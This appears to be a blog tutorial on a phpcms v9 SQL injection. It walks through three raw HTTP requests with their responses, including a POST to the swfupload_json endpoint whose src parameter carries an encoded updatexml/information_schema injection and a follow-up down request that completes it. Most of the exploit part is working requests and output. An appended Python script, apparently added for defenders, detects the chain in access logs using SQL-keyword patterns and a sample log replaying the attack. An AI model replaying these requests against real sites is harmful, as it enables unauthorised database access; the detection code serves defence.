
Analysis of the phpcms v9 injection vulnerability

Qian Jinhong, 2025-05-20 14:04:56, phpcms tutorial, viewed 3 times


GET /phpcms/index.php?m=wap&c=index&a=init&siteid=1 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: nYbXT_siteid=8f34EZvyi7oJBh8g69s3wO0YGxWeF_ohQ8serAzU; CNZZDATA1256104530=
First, send the request above. The response is as follows:
HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 17:29:08 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Set-Cookie: nYbXT_siteid=a504MiYFpsbeMmu-WUkntLfOSbQAJa61keJ3OvHN
Vary: Accept-Encoding
Content-Length: 35
Content-Type: text/html; charset=gbk
你访问的站点不存在或者未开启wap访问
Copy the cookie value from the response above (the nYbXT_siteid value in the Set-Cookie header, shown in red in the original write-up).
Then send the following request:
POST /phpcms/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3D%25%2A27%20and%20updatexml%281%2CCONCAT%281%2C%28SELECT%20table_name%20FROM%20information_schema.%60TABLES%60%20WHERE%20RIGHT%28table_name%2C10%29%3D%25%2A27admin_role%25%2A27%20LIMIT%200%2C1%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: nYbXT_siteid=1464mbfPNyq9TWB2vKrI0h9yNabsKQf8NI4dqH3c; CNZZDATA1256104530=
Content-Length: 57
userid_flash=a504MiYFpsbeMmu-WUkntLfOSbQAJa61keJ3OvHN
The src parameter above carries the SQL injection statement; userid_flash in the POST body is the cookie value (the red one) copied from the previous response.
The response is:
HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 17:30:02 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Set-Cookie: PHPSESSID=oj9abeufn86ajm9md7a2n8bjl4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: nYbXT_att_json=361aaa6lxxMUbdOiRKJjYjqdfLNj00tx1X6SSMesMq_-CijdCEwNjdwuPRyRpX-0E_xaXKzDfp1Bd-oAcmU73m91J-SA50PFYL-seSNzmnNqLEaBwILc3Nv00Eeg4a86xm3Jy_37V9YErAhYTFM7HEyHppebJGjwX-MlGr82wA8xOmR9P3Xm3HVQNdyPm57PUbuKBLJL1ZEoJXTLrpPWHpSFg2aXp32hU30c3TuXv_DQvzDYbUKZvZiFSSxgY4Le7IwgEyfeZzlfpOdtHUquuaVs-idCILJSNEq_6pKfqpX7Gz0edoDEuhYQLQ
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=gbk
Copy the highlighted value above (the nYbXT_att_json value in the Set-Cookie header) into the a_k parameter of the payload below to complete the injection:
GET /phpcms//index.php?m=content&c=down&a_k=361aaa6lxxMUbdOiRKJjYjqdfLNj00tx1X6SSMesMq_-CijdCEwNjdwuPRyRpX-0E_xaXKzDfp1Bd-oAcmU73m91J-SA50PFYL-seSNzmnNqLEaBwILc3Nv00Eeg4a86xm3Jy_37V9YErAhYTFM7HEyHppebJGjwX-MlGr82wA8xOmR9P3Xm3HVQNdyPm57PUbuKBLJL1ZEoJXTLrpPWHpSFg2aXp32hU30c3TuXv_DQvzDYbUKZvZiFSSxgY4Le7IwgEyfeZzlfpOdtHUquuaVs-idCILJSNEq_6pKfqpX7Gz0edoDEuhYQLQ HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: nYbXT_siteid=; CNZZDATA1256104530=
The response:
HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 17:30:10 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Vary: Accept-Encoding
Content-Length: 685
Content-Type: text/html; charset=gbk
<div style="font-size:12px;text-align:left; border:1px solid #9cc9e0; padding:1px 4px;color:#000000;font-family:Arial, Helvetica,sans-serif
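The three requests above leave a recognisable trace in a web server's access log: a wap init hit, a swfupload_json request whose src parameter decodes to SQL, and a content/down request carrying the a_k token, all from one client within a short window. The following Python script is an added example for defenders, not code from the write-up or from phpcms: it parses Apache combined-format lines, classifies each request into one of those stages, and reports a client only when the swfupload_json and down stages both occur within the window. The log lines, client addresses and the a_k token value are constructed for the example; the request paths mirror the ones shown above.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access log (Apache combined format); not taken from the page.
# Lines 1-3 replay the request chain from the write-up, lines 4-5 are benign traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Apr/2017:17:29:08 +0000] "GET /phpcms/index.php?m=wap&c=index&a=init&siteid=1 HTTP/1.1" 200 35 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Apr/2017:17:30:02 +0000] "POST /phpcms/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3D%25%2A27%20and%20updatexml%281%2CCONCAT%281%2C%28SELECT%20table_name%20FROM%20information_schema.%60TABLES%60%20LIMIT%200%2C1%29%29%2C1%29%23%26m%3D1 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Apr/2017:17:30:10 +0000] "GET /phpcms//index.php?m=content&c=down&a_k=AAAA_constructed_token_AAAA HTTP/1.1" 200 685 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Apr/2017:17:31:00 +0000] "GET /phpcms/index.php?m=content&c=index&a=lists&catid=7 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Apr/2017:17:31:05 +0000] "GET /phpcms/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%2Fuploadfile%2Fphoto.jpg HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Only the prefix of a combined-format line is needed: client, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# SQL fragments that have no business inside an attachment path.
SQL_MARKERS = re.compile(r'\b(updatexml|extractvalue|information_schema|union\s+select|sleep\s*\()', re.I)


def parse_line(line):
    """Return client, timestamp, method and decoded query parameters, or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs url-decodes once; encoded '&' (%26) inside src therefore stays inside src.
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "query": query,
    }


def stage(entry):
    """Map a request to a stage of the chain, or None if it is not part of it."""
    q = entry["query"]
    if q.get("m") == "wap" and q.get("a") == "init":
        return "wap_init"
    if q.get("c") == "attachments" and q.get("a") == "swfupload_json":
        # Decode a second time so a double-encoded src is inspected in clear text.
        src = unquote(q.get("src", ""))
        if SQL_MARKERS.search(src) or "%*27" in src:
            return "swfupload_sqli"
        return None
    if q.get("c") == "down" and "a_k" in q:
        return "down_a_k"
    return None


def find_chains(log_text, window_seconds=300):
    """Report clients that issued both the swfupload_json SQL request and the down a_k
    request within window_seconds; the wap init stage is recorded when present."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        s = stage(entry)
        if s:
            per_ip[entry["ip"]].append((entry["ts"], s))

    findings = []
    for ip, events in per_ip.items():
        events.sort()
        stages = [s for _, s in events]
        if "swfupload_sqli" in stages and "down_a_k" in stages:
            span = (events[-1][0] - events[0][0]).total_seconds()
            if span <= window_seconds:
                findings.append({"ip": ip, "stages": stages, "span_seconds": span})
    return findings


if __name__ == "__main__":
    for f in find_chains(SAMPLE_LOG):
        print(f"{f['ip']}: {' -> '.join(f['stages'])} within {f['span_seconds']:.0f}s")
```

Run against a real log, the same `find_chains` call is enough; the benign swfupload_json request with a plain file path in the sample is deliberately left unflagged, so a match requires SQL markers in src rather than just the endpoint name. Because the SQL is only visible after decoding, a rule that inspects the raw query string for the keyword would miss it; decoding before matching is the part of this check that matters.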
